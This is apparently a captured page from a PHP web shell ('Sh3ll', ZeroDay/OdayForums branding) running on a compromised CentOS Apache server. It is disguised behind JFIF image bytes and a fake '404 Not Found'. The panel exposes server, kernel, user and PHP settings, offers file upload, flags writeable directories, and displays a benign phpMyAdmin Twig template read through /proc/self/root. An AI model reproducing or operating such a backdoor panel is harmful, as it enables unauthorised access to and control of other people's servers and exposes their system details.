����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/usr/share/phpMyAdmin/templates/columns_definitions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/usr/share/phpMyAdmin/templates/columns_definitions/column_attribute.twig
{% if submit_attribute is defined and submit_attribute != false %}
    {% set attribute = submit_attribute %}
    {# MariaDB has additional parentheses #}
{% elseif column_meta['Extra'] is defined
    and ('on update current_timestamp' in column_meta['Extra'] or 'on update current_timestamp()' in column_meta['Extra']|lower) %}
    {% set attribute = 'on update CURRENT_TIMESTAMP' %}
{% elseif extracted_columnspec['attribute'] is defined %}
    {% set attribute = extracted_columnspec['attribute'] %}
{% else %}
    {% set attribute = '' %}
{% endif %}
{% set attribute = attribute|upper %}
<select name="field_attribute[{{ column_number }}]"
    id="field_{{ column_number }}_{{ ci - ci_offset }}">
    {% set cnt_attribute_types = attribute_types|length - 1 %}
    {% for i in 0..cnt_attribute_types %}
        <option value="{{ attribute_types[i] }}"
            {{- attribute == attribute_types[i]|upper ? ' selected="selected"' }}>
            {{ attribute_types[i] }}
        </option>
    {% endfor %}
</select>

ZeroDay Forums Mini